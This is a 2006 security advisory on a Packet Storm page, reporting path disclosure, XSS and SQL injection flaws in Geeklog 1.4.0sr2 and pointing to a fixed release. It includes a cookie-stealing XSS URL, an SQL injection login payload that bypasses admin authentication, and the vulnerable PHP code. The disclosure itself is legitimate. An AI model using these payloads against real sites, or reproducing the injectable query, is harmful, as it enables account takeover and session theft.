what you don't know can hurt you

KAPDA-45.txt

KAPDA-45.txt
Posted May 29, 2006
Site KAPDA.ir

KAPDA #45: geeklog-1.4.0sr2 and prior versions suffer from Path Disclosure, XSS, SQL Injection vulnerabilities.

tags | advisory, vulnerability, sql injection
MD5 | 07609d1613d0ba6db160461fa6f45399

KAPDA-45.txt

Change Mirror Download
KAPDA New advisory

Vendor: http://www.geeklog.net
Bugs: Path Disclosure, XSS, SQL Injection
(Authentication bypass)

Vulnerable Version: geeklog-1.4.0sr2(prior versions
also may be affected)
Exploitation: Remote with browser

Description:
--------------------
geeklog is a freely available PHP-based web content
management system that uses a MySQL database.
Vulnerabilities:
--------------------
-->>Path Disclosure<<--
Reason: direct access to special files that generates
php error with installation path information.
Several files are vulnerable in this case.
Example:
http://example.com/geeklog/layout/professional/functions.php
http://example.com/geeklog/getimage.php?mode=show&image=dd

-->>XSS<<--
Reason: the script doesn't properly validate user
supplied input in getimage.php that result in xss
vulnerability

Example:
http://example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>


Code Snippets:
/getimage.php line#100-103

$display = COM_errorLog('File, ' .
$downloader->getPath() . $image . ', was not found in
getimage.php');

if ($mode == 'show') {
echo COM_siteHeader ('menu') . $display .
COM_siteFooter ();

-->>SQL Injection (Authentication bypass)<<--
Reason: again the script doesn't properly validate
user supplied input in /admin/auth.inc.php that may
result in Authentication bypass using sql injection to
gain admin privileges.

Code Snippets:
/admin/auth.inc.php line#44-45

if (!empty ($_POST['loginname']) && !empty
($_POST['passwd'])) {
$status = SEC_authenticate ($_POST['loginname'],
$_POST['passwd'], $uid);


../system/lib-security.php line#697-732

function SEC_authenticate($username, $password, &$uid)
{
global $_TABLES, $LANG01, $_CONF;

$result = DB_query( "SELECT status, passwd, email,
uid FROM {$_TABLES['users']} WHERE
username='$username' AND ((remoteservice is null) or
(remoteservice = ''))" );
$tmp = mysql_errno();
$nrows = DB_numRows( $result );

if(( $tmp == 0 ) && ( $nrows == 1 ))
{
$U = DB_fetchArray( $result );
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED)
{
return USER_ACCOUNT_DISABLED; // banned,
jump to here to save an md5 calc.
} elseif ($U['passwd'] != md5( $password )) {
return -1; // failed login
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_APPROVAL) {
//awaiting approval, jump to msg.
echo COM_refresh($_CONF['site_url'] .
'/users.php?msg=70');
exit;
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_ACTIVATION) {
// Awaiting user activation, activate:

DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username);
return USER_ACCOUNT_ACTIVE;
} else {
return $U['status']; // just return their
status
}
}
else
{
$tmp = $LANG01[32] . ": '" . $username . "'";
COM_errorLog( $tmp, 1 );
return -1;
}
}

as you see there is no input validation here so when
magic_quotes_gpc=off you can bypass login
Authentication.

Example:
/admin/moderation.php POST data:
loginname:
me' union select
3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from
gl_users where username='Admin
passwd:
22222

Solution:
--------------------
Version geeklog-1.4.0sr3 is available now.
http://www.geeklog.net/article.php/geeklog-1.4.0sr3

Original Advisory:
--------------------
http://kapda.ir/advisory-336.html

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    2 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    16 Files
  • 13
    Feb 13th
    19 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close